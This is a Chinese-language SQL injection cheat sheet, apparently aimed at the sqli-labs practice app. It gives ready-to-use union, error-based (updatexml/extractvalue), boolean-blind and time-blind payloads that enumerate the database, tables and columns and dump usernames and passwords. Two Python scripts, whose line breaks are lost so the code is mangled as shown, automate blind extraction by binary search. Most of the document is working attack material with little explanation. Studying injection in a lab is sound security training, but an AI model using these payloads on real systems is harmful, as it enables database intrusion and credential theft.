SQL注入

联合查询

联合查询注入是一种特定类型的SQL注入攻击。通过利用UNION SQL操作符，攻击者可以将多个SELECT语句的结果合并为一个结果集，从而获取更多的数据。

联合查询注入需要查询的信息在前端页面有回显，将提取数据库信息在前端页面显示。

确认列数

?id=1' order by 3 --+ 

?id=' union select 1,1,1 --+     #union连接时前边条件为假时后边条件才生效

获取库名

?id=' union select 1,database(),1 --+

获取表名

?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1 --+

获取列名

?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1 --+

获取数据

?id=' union select 1,(select group_concat(username,0x3a,password) from users),1 --+

报错注入

SQL注入的报错注入是一种攻击方式，利用数据库在处理错误时返回的信息来推测数据库结构或敏感信息

报错注入需要在前端页面返回数据库错误信息，利用数据库错误信息来推测数据库内部结构和数据。

updatexml(1,1,1) 一共可接收三个参数，报错位置在第二个参数

extractvalue(1,1) 一共可接收两个参数，报错位置在第二个参数

获取库名

?id=' and updatexml(1,concat(0x3a,database(),0x3a),1) --+

?id=' and extractvalue(1,concat(0x3a,database(),0x3a)) --+

获取表名

?id=' and updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3a),1) --+

?id=' and extractvalue(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3a)) --+

获取列名

?id=' and updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security'),0x3a),1) --+

?id=' and extractvalue(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security'),0x3a)) --+

注：updatexml，extractvalue最长可获取32个字节

?id=' and updatexml(1,concat(0x3a,substr((select group_concat(column_name) from information_schema.columns where table_schema='security'),1,32),0x3a),1) --+

?id=' and extractvalue(1,concat(0x3a,substr((select group_concat(column_name) from information_schema.columns where table_schema='security'),1,32),0x3a)) --+

布尔盲注

布尔盲注是一种SQL注入技术，构造一个二元（即真/假）条件，并观察应用程序的响应是否变化。基于响应的不同，可以推测出数据库中的信息。

布尔盲注需要根据查询条件的对错给出不同的响应，利用响应的差异来推测数据库内部结构和数据。

获取长度

?id=1' and length(database())>8 --+   #and 前后两个条件需要同时成立结果为真

获取库名

?id=1' and ascii(substr(database(),1,1))>115 --+

获取表名

?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>115 --+

获取列名

?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))>115 --+

获取数据

?id=1' and ascii(substr((select group_concat(username,0x3a,password) from

users),1,1))>115 --+

import requestsurl = "http://127.0.0.1//sqli/Less-8/index.php"def inject_database(url):# 使用二分法查询name = ''for i in range(100):low = 32high = 128# ascii表从32-128为可见字符mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d,1))>%d -- " % (i + 1, mid)   #查库名# payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d -- " % (i + 1, mid)  # 查表名# payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d -- " % (i + 1, mid)   #查列名# payload = "1' and ascii(substr((select group_concat(username,0x3a,password) from users),%d,1))>%d -- " % (i + 1, mid)    #查数据params = {"id": payload}r = requests.get(url, params=params)if 'You are in...........' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)if __name__ == "__main__":inject_database(url)

时间盲注

时间盲注是一种利用数据库响应时间来推测信息的攻击方式。通过在 SQL 查询中引入延时条件，攻击者可以根据响应时间的长短判断某些信息是否正确。

获取长度

?id=1' and if(length(database())>6,sleep(1),0) --+ 

获取库名

?id=1' and if(ascii(substr(database(),1,1))>50,sleep(1),0) --+ 

获取表名

?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>50,sleep(1),0) --+ 

获取列名

?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))>50,sleep(1),0) --+ 

获取数据

?id=1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),1,1))>50,sleep(1),0) --+ 

import requests
import timeurl = "http://127.0.0.1//sqli/Less-9/index.php"def inject_database(url):# 使用二分法查询name = ''for i in range(100):low = 32high = 128# ascii表从32-128为可见字符mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(1),0) -- "  % (i + 1, mid)  #查库名#payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))>%d,sleep(1),0) -- "  % (i + 1, mid)  #查表名#payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))>%d,sleep(1),0) -- "  % (i + 1, mid)  #查列名#payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1))>%d,sleep(1),0) -- " % (i + 1, mid)  #查数据params = {"id": payload}start_time = time.time()r = requests.get(url, params=params)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname += chr(mid)print(name)if __name__ == "__main__":inject_database(url)